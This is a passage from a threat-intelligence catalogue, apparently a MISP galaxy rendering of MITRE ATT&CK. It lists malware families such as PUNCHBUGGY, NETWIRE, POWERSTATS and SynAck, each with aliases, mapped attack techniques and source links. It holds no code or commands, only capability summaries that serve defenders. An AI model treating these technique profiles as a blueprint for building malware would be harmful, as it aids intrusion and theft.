uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

Table 4913. Table References
Links
https://attack.mitre.org/software/S0168
https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf
https://securelist.com/introducing-whitebear/81638/
https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/

PUNCHBUGGY - S0196

[PUNCHBUGGY](https://attack.mitre.org/software/S0196) is a backdoor malware used by [FIN8](https://attack.mitre.org/groups/G0061) that has been observed targeting POS networks in the hospitality industry. (Citation: Morphisec ShellTea June 2019)(Citation: FireEye Fin8 May 2016) (Citation: FireEye Know Your Enemy FIN8 Aug 2016)

The tag is: misp-galaxy:mitre-malware="PUNCHBUGGY - S0196"

PUNCHBUGGY - S0196 is also known as:

PUNCHBUGGY
ShellTea

View relationships graph

PUNCHBUGGY - S0196 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1546.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"

Table 4914. Table References
Links
https://attack.mitre.org/software/S0196
http://blog.morphisec.com/security-alert-fin8-is-back
https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html
https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html

RawPOS - S0169

[RawPOS](https://attack.mitre.org/software/S0169) is a point-of-sale (POS) malware family that searches for cardholder data on victims. It has been in use since at least 2008. (Citation: Kroll RawPOS Jan 2017) (Citation: TrendMicro RawPOS April 2015) (Citation: Visa RawPOS March 2015) FireEye divides RawPOS into three components: FIENDCRY, DUEBREW, and DRIFTWOOD. (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)

The tag is: misp-galaxy:mitre-malware="RawPOS - S0169"

RawPOS - S0169 is also known as:

RawPOS
FIENDCRY
DUEBREW
DRIFTWOOD

View relationships graph

RawPOS - S0169 has relationships with:

similar: misp-galaxy:malpedia="RawPOS" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"

Table 4915. Table References
Links
https://attack.mitre.org/software/S0169
https://www.kroll.com/en/insights/publications/malware-analysis-report-rawpos-malware
http://sjc1-te-ftp.trendmicro.com/images/tex/pdf/RawPOS%20Technical%20Brief.pdf
https://usa.visa.com/dam/VCOM/download/merchants/alert-rawpos.pdf
https://www.youtube.com/watch?v=fevGZs0EQu8
https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?
https://github.com/DiabloHorn/mempdump

Daserf - S0187

[Daserf](https://attack.mitre.org/software/S0187) is a backdoor that has been used to spy on and steal from Japanese, South Korean, Russian, Singaporean, and Chinese victims. Researchers have identified versions written in both Visual C and Delphi. (Citation: Trend Micro Daserf Nov 2017) (Citation: Secureworks BRONZE BUTLER Oct 2017)

The tag is: misp-galaxy:mitre-malware="Daserf - S0187"

Daserf - S0187 is also known as:

Daserf
Muirim
Nioupale

View relationships graph

Daserf - S0187 has relationships with:

similar: misp-galaxy:malpedia="Daserf" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1001.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

Table 4916. Table References
Links
https://attack.mitre.org/software/S0187
http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/
https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses

Truvasys - S0178

[Truvasys](https://attack.mitre.org/software/S0178) is first-stage malware that has been used by [PROMETHIUM](https://attack.mitre.org/groups/G0056). It is a collection of modules written in the Delphi programming language. (Citation: Microsoft Win Defender Truvasys Sep 2017) (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21)

The tag is: misp-galaxy:mitre-malware="Truvasys - S0178"

Truvasys - S0178 is also known as:

Truvasys

View relationships graph

Truvasys - S0178 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 4917. Table References
Links
https://attack.mitre.org/software/S0178
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Truvasys.A!dha
https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/
http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf

PUNCHTRACK - S0197

[PUNCHTRACK](https://attack.mitre.org/software/S0197) is non-persistent point of sale (POS) system malware utilized by [FIN8](https://attack.mitre.org/groups/G0061) to scrape payment card data. (Citation: FireEye Fin8 May 2016) (Citation: FireEye Know Your Enemy FIN8 Aug 2016)

The tag is: misp-galaxy:mitre-malware="PUNCHTRACK - S0197"

PUNCHTRACK - S0197 is also known as:

PUNCHTRACK
PSVC

View relationships graph

PUNCHTRACK - S0197 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 4918. Table References
Links
https://attack.mitre.org/software/S0197
https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html
https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html

Starloader - S0188

[Starloader](https://attack.mitre.org/software/S0188) is a loader component that has been observed loading [Felismus](https://attack.mitre.org/software/S0171) and associated tools. (Citation: Symantec Sowbug Nov 2017)

The tag is: misp-galaxy:mitre-malware="Starloader - S0188"

Starloader - S0188 is also known as:

Starloader

View relationships graph

Starloader - S0188 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

Table 4919. Table References
Links
https://attack.mitre.org/software/S0188
https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments

NETWIRE - S0198

[NETWIRE](https://attack.mitre.org/software/S0198) is a publicly available, multiplatform remote administration tool (RAT) that has been used by criminal and APT groups since at least 2012.(Citation: FireEye APT33 Sept 2017)(Citation: McAfee Netwire Mar 2015)(Citation: FireEye APT33 Webinar Sept 2017)

The tag is: misp-galaxy:mitre-malware="NETWIRE - S0198"

NETWIRE - S0198 is also known as:

NETWIRE

View relationships graph

NETWIRE - S0198 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Invalid Code Signature - T1036.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="XDG Autostart Entries - T1547.013" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Login Items - T1547.015" with estimative-language:likelihood-probability="almost-certain"

Table 4920. Table References
Links
https://attack.mitre.org/software/S0198
https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html
https://securingtomorrow.mcafee.com/mcafee-labs/netwire-rat-behind-recent-targeted-attacks/
https://www.brighttalk.com/webcast/10703/275683

ISMInjector - S0189

[ISMInjector](https://attack.mitre.org/software/S0189) is a Trojan used to install another [OilRig](https://attack.mitre.org/groups/G0049) backdoor, ISMAgent. (Citation: OilRig New Delivery Oct 2017)

The tag is: misp-galaxy:mitre-malware="ISMInjector - S0189"

ISMInjector - S0189 is also known as:

ISMInjector

View relationships graph

ISMInjector - S0189 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 4921. Table References
Links
https://attack.mitre.org/software/S0189
https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/

TURNEDUP - S0199

[TURNEDUP](https://attack.mitre.org/software/S0199) is a non-public backdoor. It has been dropped by [APT33](https://attack.mitre.org/groups/G0064)'s [StoneDrill](https://attack.mitre.org/software/S0380) malware. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)

The tag is: misp-galaxy:mitre-malware="TURNEDUP - S0199"

TURNEDUP - S0199 is also known as:

TURNEDUP

View relationships graph

TURNEDUP - S0199 has relationships with:

similar: misp-galaxy:malpedia="TURNEDUP" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asynchronous Procedure Call - T1055.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 4922. Table References
Links
https://attack.mitre.org/software/S0199
https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html
https://www.brighttalk.com/webcast/10703/275683

CCBkdr - S0222

[CCBkdr](https://attack.mitre.org/software/S0222) is malware that was injected into a signed version of CCleaner and distributed from CCleaner’s distribution website. (Citation: Talos CCleanup 2017) (Citation: Intezer Aurora Sept 2017)

The tag is: misp-galaxy:mitre-malware="CCBkdr - S0222"

CCBkdr - S0222 is also known as:

CCBkdr

View relationships graph

CCBkdr - S0222 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Compromise Software Supply Chain - T1195.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"

Table 4923. Table References
Links
https://attack.mitre.org/software/S0222
http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/

POWERSTATS - S0223

[POWERSTATS](https://attack.mitre.org/software/S0223) is a PowerShell-based first stage backdoor used by [MuddyWater](https://attack.mitre.org/groups/G0069). (Citation: Unit 42 MuddyWater Nov 2017)

The tag is: misp-galaxy:mitre-malware="POWERSTATS - S0223"

POWERSTATS - S0223 is also known as:

POWERSTATS
Powermud

View relationships graph

POWERSTATS - S0223 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"

Table 4924. Table References
Links
https://attack.mitre.org/software/S0223
https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/
https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group

HummingBad - S0322

[HummingBad](https://attack.mitre.org/software/S0322) is a family of Android malware that generates fraudulent advertising revenue and has the ability to obtain root access on older, vulnerable versions of Android. (Citation: ArsTechnica-HummingBad)

The tag is: misp-galaxy:mitre-malware="HummingBad - S0322"

HummingBad - S0322 is also known as:

HummingBad

View relationships graph

HummingBad - S0322 has relationships with:

similar: misp-galaxy:android="HummingBad" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Generate Fraudulent Advertising Revenue - T1472" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Manipulate App Store Rankings or Ratings - T1452" with estimative-language:likelihood-probability="almost-certain"

Table 4925. Table References
Links
https://attack.mitre.org/software/S0322
http://arstechnica.com/security/2016/07/virulent-auto-rooting-malware-takes-control-of-10-million-android-devices/

HOMEFRY - S0232

[HOMEFRY](https://attack.mitre.org/software/S0232) is a 64-bit Windows password dumper/cracker that has previously been used in conjunction with other [Leviathan](https://attack.mitre.org/groups/G0065) backdoors. (Citation: FireEye Periscope March 2018)

The tag is: misp-galaxy:mitre-malware="HOMEFRY - S0232"

HOMEFRY - S0232 is also known as:

HOMEFRY

View relationships graph

HOMEFRY - S0232 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 4926. Table References
Links
https://attack.mitre.org/software/S0232
https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

SynAck - S0242

[SynAck](https://attack.mitre.org/software/S0242) is variant of Trojan ransomware targeting mainly English-speaking users since at least fall 2017. (Citation: SecureList SynAck Doppelgänging May 2018) (Citation: Kaspersky Lab SynAck May 2018)

The tag is: misp-galaxy:mitre-malware="SynAck - S0242"

SynAck - S0242 is also known as:

SynAck

View relationships graph

SynAck - S0242 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Doppelgänging - T1055.013" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Language Discovery - T1614.001" with estimative-language:likelihood-probability="almost-certain"

Table 4927. Table References
Links
https://attack.mitre.org/software/S0242
https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
https://usa.kaspersky.com/about/press-releases/2018_synack-doppelganging

Anubis - S0422

[Anubis](https://attack.mitre.org/software/S0422) is Android malware that was originally used for cyber espionage, and has been retooled as a banking trojan.(Citation: Cofense Anubis)

The tag is: misp-galaxy:mitre-malware="Anubis - S0422"

Anubis - S0422 is also known as:

Anubis

View relationships graph

Anubis - S0422 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1471" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"
